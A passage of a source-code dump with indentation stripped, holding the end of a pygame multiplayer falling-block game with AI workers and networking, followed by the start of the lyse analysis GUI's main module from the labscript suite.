encoded = ''
for row in range(len(self.games[game_ID].board)):
for col in range(len(self.games[game_ID].board[0])):
encoded = encoded + str(self.games[game_ID].board[row][col])
# Omit ':' for last row
if row != len(self.games[game_ID].board) - 1:
encoded = encoded + ':'
return report[0], encoded
# For graphic performance: track whether this game has changed this frame
self.updated_boards.append(game_ID)
# Loop through reports
for report in reports:
if report[0] == 'loss':
if len(self.games) > 1:
self.games[game_ID].score = -1
else:
self.winner = 0
return False
elif report[0] == 'winner':
self.winner = report[1]
elif report[0] == 'move':
# Update piece position
self.games[game_ID].piece_row = report[1]
self.games[game_ID].piece_col = report[2] - 3
elif report[0] == 'hold':
# Update hold piece
self.games[game_ID].hold_piece = report[1]
elif report[0] == 'shape':
# Update piece shape
self.games[game_ID].piece = report[1]
elif report[0] == 'piece':
# Update piece and location
self.games[game_ID].piece = report[1]
self.games[game_ID].piece_row = report[2]
self.games[game_ID].piece_col = report[3] - 3
elif report[0] == 'board':
# Update game board
self.games[game_ID].board = report[1]
elif report[0] == 'queue':
# Update the piece queue
self.games[game_ID].pieces = []
for piece in report[1]:
self.games[game_ID].pieces.append(piece)
elif report[0] == 'clear':
bad_lines = report[1] // 2
# Select and notify victim if master
if self.is_master and bad_lines > 0 and len(self.games) > 1:
victims = set().union(self.AI_range, self.remote_range, self.active_range)
victims.discard(game_ID)
victim = random.sample(victims, 1)[0]
if victim in self.AI_range:
self.AI_games[victim].bonus_lines = bad_lines
elif victim in self.active_range:
self.active_games[victim].bonus_lines = bad_lines
elif broadcast:
network.send_update(victim, ('bonus', bad_lines))
# Update score
self.games[game_ID].score = report[2]
elif report[0] == 'bonus':
# Update game receiving bonus lines
if game_ID in self.AI_range:
self.AI_games.bonus_lines += report[1]
elif game_ID in self.active_games:
self.active_games.bonus_lines += report[1]
if broadcast:
# pack up board data for size
if report[0] == 'board':
report = encode_board(report)
# Check for shifted games
if game_ID < self.remote_offset:
network.send_update(game_ID + self.my_offset, report)
else:
network.send_update(game_ID, report)
reports.clear()
return True
def decode_board(report):
"""
Decode board info from its string representation and return it
Board reports are of the form (game_ID, encoded_board)
Encoded boards are strings with each line separated by ':'
Return (game_ID, decoded_board)
"""
# Separate the lines and prep decoded with correct amount of elements
decoded = report[1].split(':')
for line in range(len(decoded)):
# Decode each line/element
new_line = list(decoded[line])
decoded[line] = []
for ch in new_line:
decoded[line].append(int(ch))
return report[0], decoded
def end_tick():
"""
Perform clean up tasks at the end of a tick:
-Remove lost games from active monitoring
-Check for win condition
-Check gameplay tick for all local games
"""
if len(self.games) != 1:
# remove lost games from activity checks
for ID in invalids:
self.lost_range.append(ID)
self.active_games[ID] = None
self.remote_games[ID] = None
self.AI_games[ID] = None
if ID in self.active_range:
self.active_range.remove(ID)
if ID in self.remote_range:
self.remote_range.remove(ID)
if ID in self.AI_range:
self.AI_range.remove(ID)
# winner detection
if self.is_master and len(self.games) > 1:
if len(self.active_range) + len(self.remote_range) + len(self.AI_range) < 2:
for ID in range(len(self.games)):
if ID in self.active_range:
self.active_games[ID].reports.append(('winner', ID))
if ID in self.remote_range:
self.remote_games[ID].reports.append(('winner', ID))
if ID in self.AI_range:
self.AI_games[ID].reports.append(('winner', ID))
# check for gameplay tick
for game in self.active_games:
if game is not None:
game.tick()
for game in self.AI_games:
if game is not None:
game.tick()
if self.winner is None:
# Extract reports from network queue and add them to correct game report queue
# Consider limiting rate if performance suffers
while self.is_connected and len(network.game_updates) > 0:
# handle oldest message
game_ID, report = network.game_updates.popleft()
# check whether display has been moved to relocate local games
if game_ID < self.my_offset:
game_ID = game_ID + self.remote_offset
if report[0] == 'board':
report = decode_board(report)
self.remote_games[game_ID].reports.append(report)
# process game reports for each type and note lost games
invalids = []
for game_ID in self.active_range:
# Ghost piece management outside of game object for performance reasons
global ghost
if ghost:
self.games[game_ID].ghost = self.active_games[game_ID].ghost
if len(self.active_games[game_ID].reports) > 0:
if not process_reports(self.active_games[game_ID].reports, game_ID, self.is_connected):
invalids.append(game_ID)
for game_ID in self.remote_range:
if len(self.remote_games[game_ID].reports) > 0:
if not process_reports(self.remote_games[game_ID].reports, game_ID, False):
invalids.append(game_ID)
for game_ID in self.AI_range:
if len(self.AI_games[game_ID].reports) > 0:
if not process_reports(self.AI_games[game_ID].reports, game_ID, self.is_connected):
invalids.append(game_ID)
end_tick()
else:
# Game over, we have a winner
time.sleep(3)
self.next = MainScreen()
pygame.event.clear()
def process_AI(self):
"""
Manage the AI games and the AI workers
Relies on self.ready_games to track drop timer and
AI_ready_queue to receive data from workers, and
AI_todo_queue to send them AI data in need of calculation
"""
now = time.process_time()
# Process returns from AI workers and timestamp results
while not AI_ready_queue.empty():
game_ID, new_shape, new_col = AI_ready_queue.get()
if game_ID not in self.lost_range:
self.AI_games[game_ID].unsafe_move_to(new_shape, self.AI_games[game_ID].piece_row, new_col)
self.ready_games[game_ID] = now
# Check AI games for drop timer
need_to_move = []
for game_ID in self.ready_games:
if game_ID not in self.lost_range and now - self.ready_games[game_ID] > 2:
self.AI_games[game_ID].drop()
need_to_move.append(game_ID)
# Send AI workers the data for next move when ready
for game_ID in need_to_move:
del(self.ready_games[game_ID])
AI_todo_queue.put((game_ID, self.AI_games[game_ID].board,
self.AI_games[game_ID].piece.piece_data,
self.AI_games[game_ID].piece_row))
def play_next_song(menu=False):
global song_list
if menu:
pygame.mixer.music.load(menu_music)
else:
try:
song_list = song_list[1:] + [song_list[0]]
pygame.mixer.music.load(song_list[0])
except IndexError:
pass
pygame.mixer.music.play()
def play_sound_effect(effect):
global sound_effects
if sound_effects[effect] is not None:
effect = pygame.mixer.Sound(sound_effects[effect])
effect.play()
def load_config(default=False):
"""
Load configuration from file
"""
def reset_config():
"""
Overwrite current Configuration with default
"""
try:
from shutil import copyfile
copyfile('default_configuration', 'configuration.txt')
return 'configuration.txt'
except:
try:
with open('default_configuration', encoding='utf-8'):
return 'default_configuration'
except FileNotFoundError:
quit_game()
if default:
config_file = reset_config()
else:
try:
with open('configuration.txt', encoding='utf-8'):
pass
except FileNotFoundError:
config_file = reset_config()
config_file = 'configuration.txt'
import configparser
config = configparser.ConfigParser()
config.read(config_file)
# Gameplay
global run_AI
run_AI = config['Gameplay'].getboolean('AI')
global max_games
max_games = config['Gameplay'].getint('max games')
global ghost
ghost = config['Gameplay'].getboolean('ghost')
# Video
width = config['Video'].getint('resolution width')
height = config['Video'].getint('resolution height')
max_fps = config['Video'].getint('max fps')
overscan = config['Video'].getfloat('overscan')
fullscreen = config['Video'].getboolean('fullscreen')
# Network
port = config['Network'].getint('port')
multicast = config['Network']['multicast address']
time_to_live = config['Network'].getint('time to live')
# input
menu_keys = {}
for action in config['Menu Input']:
for key in config['Menu Input'][action].split(','):
key = key.strip(' ')
# key: action
menu_keys[key] = action
inputs = []
game_keys = {}
for keymap in config['Input Devices']:
inputs.append(config['Input Devices'].getint(keymap) - 1) # for 0 index
for action in config[keymap]:
for key in config[keymap][action].split(','):
key = key.strip(' ')
# key: (player, action)
# player converted to 0 index.get()
game_keys[key] = ((config['Input Devices'].getint(keymap) - 1), action)
menu_buttons = {}
for action in config['Menu Controller']:
for button in config['Menu Controller'][action].split(','):
button = button.strip(' ')
menu_buttons[button] = action
game_buttons = {}
for action in config['Game Controller']:
for button in config['Game Controller'][action].split(','):
button = button.strip(' ')
menu_buttons[button] = action
# Init all joysticks available and map them to games without keyboard input
global joysticks
joysticks = {}
for index in range(pygame.joystick.get_count()):
mapped_to = index
while mapped_to in inputs:
mapped_to += 1
joysticks[index] = mapped_to
inputs.append(mapped_to)
pygame.joystick.Joystick(index).init()
# limit active games to amount of inputs available
global max_actives
max_actives = max_games
if len(inputs) < max_games:
max_actives = len(inputs)
global music
music = config['Sound'].getboolean('music')
global players_with_sound
players_with_sound = config['Sound'].getint('max players with sound effects')
return (width, height, fullscreen, max_fps, overscan),\
(port, multicast, time_to_live),\
(menu_keys, game_keys, menu_buttons, game_buttons)
def set_up():
"""
Call up configuration loader
Set up required variables
Start up network thread
"""
video_conf, network_conf, input_conf = load_config()
# Pygame graphics
global display
display = graphics.Graphics(*video_conf)
global local_players_count
local_players_count = 1
global backgrounds
base_dir = os.getcwd()
try:
os.chdir(os.path.join(base_dir, 'data', 'backgrounds'))
backgrounds = [os.path.join(os.getcwd(), file) for file in glob.glob('*')]
random.shuffle(backgrounds)
except FileNotFoundError:
backgrounds = None
finally:
os.chdir(base_dir)
# Network configuration and threads
global network
network = networking.Network(*network_conf)
global net_thread
net_thread = threading.Thread(target=network.loop)
net_thread.daemon = True
net_thread.start()
# AI processes
global AI_ready_queue
global AI_todo_queue
CPU_count = 1
try:
CPU_count = max(multiprocessing.cpu_count(), CPU_count)
except:
pass
AI_ready_queue = multiprocessing.SimpleQueue()
AI_todo_queue = multiprocessing.SimpleQueue()
for _ in range(CPU_count):
process = multiprocessing.Process(target=ai.AI_worker, args=(AI_ready_queue, AI_todo_queue))
process.daemon = True
process.start()
# Controls
global menu_keys
global game_keys
global menu_buttons
global game_buttons
menu_keys, game_keys, menu_buttons, game_buttons = input_conf
# Sound
base_dir = os.getcwd()
global music
global song_list
global menu_music
song_list = []
if music:
try:
os.chdir(os.path.join(base_dir, 'data', 'music'))
song_list = [os.path.join(os.getcwd(), file) for file in glob.glob('*.ogg') if file != 'menu.ogg']
menu_music = os.path.join(os.getcwd(), 'menu.ogg')
random.shuffle(song_list)
except FileNotFoundError:
music = False
finally:
os.chdir(base_dir)
global sound_effects
sound_effects = {
'drop': None,
'turn': None,
'move': None,
'punish': None,
'store': None,
}
try:
os.chdir(os.path.join(base_dir, 'data', 'sounds'))
for effect in sound_effects:
try:
sound_effects[effect] = os.path.join(os.getcwd(), f'{effect}.wav')
except KeyError:
continue
except FileNotFoundError:
pass
finally:
os.chdir(base_dir)
def quit_game():
"""
Clean up function to cleanly exit game
Ends pygame and AI processes
"""
global exit_triggered
exit_triggered = True
# Send kill signal to all AI workers
try:
for _ in range(max(multiprocessing.cpu_count(), 1)):
AI_todo_queue.put(- 1)
except:
pass
def main():
pygame.mixer.pre_init(44100, -16, 1, 512)
pygame.mixer.init()
pygame.init()
# register custom event
global SONG_END
SONG_END = pygame.USEREVENT + 1
pygame.mixer.music.set_endevent(SONG_END)
pygame.event.set_allowed([pygame.QUIT, pygame.KEYDOWN, pygame.KEYUP, pygame.JOYBUTTONUP, pygame.JOYBUTTONDOWN, pygame.JOYHATMOTION, SONG_END])
set_up()
active_screen = TitleScreen()
pause_triggered = False
global exit_triggered
exit_triggered = False
# main loop
while True:
pause_triggered = active_screen.process_input()
if not pause_triggered and not exit_triggered:
active_screen.process_events()
active_screen.process_AI()
active_screen = active_screen.next
active_screen.update_display()
else:
if exit_triggered:
pygame.quit()
sys.exit()
time.sleep(0.1)
if __name__ == '__main__':
"""GLHF"""
main()
|
__main__.py | from __future__ import division, unicode_literals, print_function, absolute_import # Ease the transition to Python 3
import os
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'lyse.svg'))
splash.show()
splash.update_text('importing standard library modules')
# stdlib imports
import sys
import socket
import logging
import threading
import signal
import subprocess
import time
import traceback
import pprint
import ast
# 3rd party imports:
splash.update_text('importing numpy')
import numpy as np
splash.update_text('importing h5_lock and h5py')
import labscript_utils.h5_lock
import h5py
splash.update_text('importing pandas')
import pandas
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.12.4', '3')
from labscript_utils.ls_zprocess import ZMQServer, ProcessTree
import zprocess
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
from labscript_utils.qtwidgets.headerview_with_widgets import HorizontalHeaderViewWithWidgets
from labscript_utils.qtwidgets.outputbox import OutputBox
import labscript_utils.shared_drive as shared_drive
from lyse.dataframe_utilities import (concat_with_padding,
get_dataframe_from_shot,
replace_with_padding)
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
from qtutils import inmain_decorator, inmain, UiLoader, DisconnectContextManager
from qtutils.auto_scroll_to_end import set_auto_scroll_to_end
import qtutils.icons
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
from lyse import LYSE_DIR
process_tree = ProcessTree.instance()
# Set a meaningful name for zlock client id:
process_tree.zlock_client.set_process_name('lyse')
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.join(LYSE_DIR, 'lyse.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.join(LYSE_DIR, '__main__.py')
relaunch_display_name = app_descriptions['lyse']
set_appusermodel(window_id, appids['lyse'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'lyse', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
def scientific_notation(x, sigfigs=4, mode='eng'):
"""Returns a unicode string of the float f in scientific notation"""
times = u'\u00d7'
thinspace = u'\u2009'
hairspace = u'\u200a'
sups = {u'-': u'\u207b',
u'0': u'\u2070',
u'1': u'\xb9',
u'2': u'\xb2',
u'3': u'\xb3',
u'4': u'\u2074',
u'5': u'\u2075',
u'6': u'\u2076',
u'7': u'\u2077',
u'8': u'\u2078',
u'9': u'\u2079'}
prefixes = {
-24: u"y",
-21: u"z",
-18: u"a",
-15: u"f",
-12: u"p",
-9: u"n",
-6: u"\u03bc",
-3: u"m",
0: u"",
3: u"k",
6: u"M",
9: u"G",
12: u"T",
15: u"P",
18: u"E",
21: u"Z",
24: u"Y"
}
if not isinstance(x, float):
raise TypeError('x must be floating point number')
if np.isnan(x) or np.isinf(x):
return str(x)
if x != 0:
exponent = int(np.floor(np.log10(np.abs(x))))
# Only multiples of 10^3
exponent = int(np.floor(exponent / 3) * 3)
else:
exponent = 0
significand = x / 10 ** exponent
pre_decimal, post_decimal = divmod(significand, 1)
digits = sigfigs - len(str(int(pre_decimal)))
significand = round(significand, digits)
result = str(significand)
if exponent:
if mode == 'exponential':
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
elif mode == 'eng':
try:
# If our number has an SI prefix then use it
prefix = prefixes[exponent]
result += hairspace + prefix
except KeyError:
# Otherwise display in scientific notation
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
return result
def get_screen_geometry():
"""Return the a list of the geometries of each screen: each a tuple of
left, top, width and height"""
geoms = []
desktop = qapplication.desktop()
for i in range(desktop.screenCount()):
sg = desktop.screenGeometry(i)
geoms.append((sg.left(), sg.top(), sg.width(), sg.height()))
return geoms
class WebServer(ZMQServer):
def handler(self, request_data):
logger.info('WebServer request: %s' % str(request_data))
if request_data == 'hello':
return 'hello'
elif request_data == 'get dataframe':
# infer_objects() picks fixed datatypes for columns that are compatible with
# fixed datatypes, dramatically speeding up pickling. It is called here
# rather than when updating the dataframe as calling it during updating may
# call it needlessly often, whereas it only needs to be called prior to
# sending the dataframe to a client requesting it, as we're doing now.
app.filebox.shots_model.infer_objects()
return app.filebox.shots_model.dataframe
elif isinstance(request_data, dict):
if 'filepath' in request_data:
h5_filepath = shared_drive.path_to_local(request_data['filepath'])
if isinstance(h5_filepath, bytes):
h5_filepath = h5_filepath.decode('utf8')
if not isinstance(h5_filepath, str):
raise AssertionError(str(type(h5_filepath)) + ' is not str or bytes')
app.filebox.incoming_queue.put(h5_filepath)
return 'added successfully'
elif isinstance(request_data, str):
# Just assume it's a filepath:
app.filebox.incoming_queue.put(shared_drive.path_to_local(request_data))
return "Experiment added successfully\n"
return ("error: operation not supported. Recognised requests are:\n "
"'get dataframe'\n 'hello'\n {'filepath': <some_h5_filepath>}")
class LyseMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
self.closing = False
def closeEvent(self, event):
if self.closing:
return QtWidgets.QMainWindow.closeEvent(self, event)
if app.on_close_event():
self.closing = True
timeout_time = time.time() + 2
self.delayedClose(timeout_time)
event.ignore()
def delayedClose(self, timeout_time):
if not all(app.workers_terminated().values()) and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.delayedClose(timeout_time))
else:
QtCore.QTimer.singleShot(0, self.close)
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class AnalysisRoutine(object):
def __init__(self, filepath, model, output_box_port, checked=QtCore.Qt.Checked):
self.filepath = filepath
self.shortname = os.path.basename(self.filepath)
self.model = model
self.output_box_port = output_box_port
self.COL_ACTIVE = RoutineBox.COL_ACTIVE
self.COL_STATUS = RoutineBox.COL_STATUS
self.COL_NAME = RoutineBox.COL_NAME
self.ROLE_FULLPATH = RoutineBox.ROLE_FULLPATH
self.error = False
self.done = False
self.to_worker, self.from_worker, self.worker = self.start_worker()
# Make a row to put into the model:
active_item = QtGui.QStandardItem()
active_item.setCheckable(True)
active_item.setCheckState(checked)
info_item = QtGui.QStandardItem()
name_item = QtGui.QStandardItem(self.shortname)
name_item.setToolTip(self.filepath)
name_item.setData(self.filepath, self.ROLE_FULLPATH)
self.model.appendRow([active_item, info_item, name_item])
self.exiting = False
def start_worker(self):
# Start a worker process for this analysis routine:
worker_path = os.path.join(LYSE_DIR, 'analysis_subprocess.py')
child_handles = process_tree.subprocess(
worker_path,
output_redirection_port=self.output_box_port,
startup_timeout=30,
)
to_worker, from_worker, worker = child_handles
# Tell the worker what script it with be executing:
to_worker.put(self.filepath)
return to_worker, from_worker, worker
def do_analysis(self, filepath):
self.to_worker.put(['analyse', filepath])
signal, data = self.from_worker.get()
if signal == 'error':
return False, data
elif signal == 'done':
return True, data
else:
raise ValueError('invalid signal %s'%str(signal))
@inmain_decorator()
def set_status(self, status):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted. Nothing to do here.
return
status_item = self.model.item(index, self.COL_STATUS)
if status == 'done':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
self.done = True
self.error = False
elif status == 'working':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/hourglass'))
self.done = False
self.error = False
elif status == 'error':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/exclamation'))
self.error = True
self.done = False
elif status == 'clear':
status_item.setData(None, QtCore.Qt.DecorationRole)
self.done = False
self.error = False
else:
raise ValueError(status)
@inmain_decorator()
def enabled(self):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted.
return False
enabled_item = self.model.item(index, self.COL_ACTIVE)
return (enabled_item.checkState() == QtCore.Qt.Checked)
def get_row_index(self):
"""Returns the row index for this routine's row in the model"""
for row in range(self.model.rowCount()):
name_item = self.model.item(row, self.COL_NAME)
fullpath = name_item.data(self.ROLE_FULLPATH)
if fullpath == self.filepath:
return row
def restart(self):
# TODO set status to 'restarting' or an icon or something, and gray out the item?
self.end_child(restart=True)
def remove(self):
"""End the child process and remove from the treeview"""
self.end_child()
index = self.get_row_index()
if index is None:
# Already gone
return
self.model.removeRow(index)
def end_child(self, restart=False):
self.to_worker.put(['quit', None])
timeout_time = time.time() + 2
self.exiting = True
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(self.worker, timeout_time, kill=False, restart=restart))
def check_child_exited(self, worker, timeout_time, kill=False, restart=False):
worker.poll()
if worker.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill, restart))
return
elif worker.returncode is None:
if not kill:
worker.terminate()
app.output_box.output('%s worker not responding.\n'%self.shortname)
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill=True, restart=restart))
return
else:
worker.kill()
app.output_box.output('%s worker killed\n'%self.shortname, red=True)
elif kill:
app.output_box.output('%s worker terminated\n'%self.shortname, red=True)
else:
app.output_box.output('%s worker exited cleanly\n'%self.shortname)
# if analysis was running notify analysisloop that analysis has failed
self.from_worker.put(('error', {}))
if restart:
self.to_worker, self.from_worker, self.worker = self.start_worker()
app.output_box.output('%s worker restarted\n'%self.shortname)
self.exiting = False
class TreeView(QtWidgets.QTreeView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTreeView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click."""
def __init__(self, *args):
QtWidgets.QTreeView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTreeView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTreeView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class RoutineBox(object):
COL_ACTIVE = 0
COL_STATUS = 1
COL_NAME = 2
ROLE_FULLPATH = QtCore.Qt.UserRole + 1
# This data (stored in the name item) does not necessarily match
# the position in the model. It will be set just
# prior to sort() being called with this role as the sort data.
# This is how we will reorder the model's rows instead of
# using remove/insert.
ROLE_SORTINDEX = QtCore.Qt.UserRole + 2
def __init__(self, container, exp_config, filebox, from_filebox, to_filebox, output_box_port, multishot=False):
self.multishot = multishot
self.filebox = filebox
self.exp_config = exp_config
self.from_filebox = from_filebox
self.to_filebox = to_filebox
self.output_box_port = output_box_port
self.logger = logging.getLogger('lyse.RoutineBox.%s'%('multishot' if multishot else 'singleshot'))
loader = UiLoader()
loader.registerCustomWidget(TreeView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'routinebox.ui'))
container.addWidget(self.ui)
if multishot:
self.ui.groupBox.setTitle('Multishot routines')
else:
self.ui.groupBox.setTitle('Singleshot routines')
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.ui.treeView.setHeader(self.header)
self.ui.treeView.setModel(self.model)
active_item = QtGui.QStandardItem()
active_item.setToolTip('Whether the analysis routine should run')
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('The status of this analyis routine\'s execution')
name_item = QtGui.QStandardItem('name')
name_item.setToolTip('The name of the python script for the analysis routine')
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setToolTip('whether the analysis routine should run')
self.header.setWidget(self.COL_ACTIVE, self.select_all_checkbox)
self.header.setStretchLastSection(True)
self.select_all_checkbox.setTristate(False)
self.model.setHorizontalHeaderItem(self.COL_ACTIVE, active_item)
self.model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
self.model.setHorizontalHeaderItem(self.COL_NAME, name_item)
self.model.setSortRole(self.ROLE_SORTINDEX)
self.ui.treeView.resizeColumnToContents(self.COL_ACTIVE)
self.ui.treeView.resizeColumnToContents(self.COL_STATUS)
self.ui.treeView.setColumnWidth(self.COL_NAME, 200)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'set selected routines active', self.ui)
self.action_set_selected_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'set selected routines inactive', self.ui)
self.action_restart_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/arrow-circle'), 'restart worker process for selected routines', self.ui)
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected routines', self.ui)
self.last_opened_routine_folder = self.exp_config.get('paths', 'analysislib')
self.routines = []
self.connect_signals()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.toolButton_add_routines.clicked.connect(self.on_add_routines_clicked)
self.ui.toolButton_remove_routines.clicked.connect(self.on_remove_selection)
self.model.itemChanged.connect(self.on_model_item_changed)
self.ui.treeView.doubleLeftClicked.connect(self.on_treeview_double_left_clicked)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_active.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_inactive.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
self.action_restart_selected.triggered.connect(self.on_restart_selected_triggered)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
self.ui.toolButton_move_to_top.clicked.connect(self.on_move_to_top_clicked)
self.ui.toolButton_move_up.clicked.connect(self.on_move_up_clicked)
self.ui.toolButton_move_down.clicked.connect(self.on_move_down_clicked)
self.ui.toolButton_move_to_bottom.clicked.connect(self.on_move_to_bottom_clicked)
def on_add_routines_clicked(self):
routine_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select analysis routines',
self.last_opened_routine_folder,
"Python scripts (*.py)")
if type(routine_files) is tuple:
routine_files, _ = routine_files
if not routine_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
routine_files = [os.path.abspath(routine_file) for routine_file in routine_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_routine_folder = os.path.dirname(routine_files[0])
self.add_routines([(routine_file, QtCore.Qt.Checked) for routine_file in routine_files])
def add_routines(self, routine_files, clear_existing=False):
"""Add routines to the routine box, where routine_files is a list of
tuples containing the filepath and whether the routine is enabled or
not when it is added. if clear_existing == True, then any existing
analysis routines will be cleared before the new ones are added."""
if clear_existing:
for routine in self.routines[:]:
routine.remove()
self.routines.remove(routine)
# Queue the files to be opened:
for filepath, checked in routine_files:
if filepath in [routine.filepath for routine in self.routines]:
app.output_box.output('Warning: Ignoring duplicate analysis routine %s\n'%filepath, red=True)
continue
routine = AnalysisRoutine(filepath, self.model, self.output_box_port, checked)
self.routines.append(routine)
self.update_select_all_checkstate()
def on_treeview_double_left_clicked(self, index):
# If double clicking on the the name item, open
# the routine in the specified text editor:
if index.column() != self.COL_NAME:
return
name_item = self.model.item(index.row(), self.COL_NAME)
routine_filepath = name_item.data(self.ROLE_FULLPATH)
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
if not editor_path:
error_dialog("No editor specified in the labconfig.")
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else routine_filepath for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [routine_filepath] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
if not selected_rows:
return
if confirm and not question_dialog("Remove %d routines?" % len(selected_rows)):
return
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines[:]:
if routine.filepath in filepaths:
routine.remove()
self.routines.remove(routine)
self.update_select_all_checkstate()
def on_model_item_changed(self, item):
if item.column() == self.COL_ACTIVE:
self.update_select_all_checkstate()
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
with self.model_item_changed_disconnected:
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(state)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui.treeView)
menu.addAction(self.action_set_selected_active)
menu.addAction(self.action_set_selected_inactive)
menu.addAction(self.action_restart_selected)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, active):
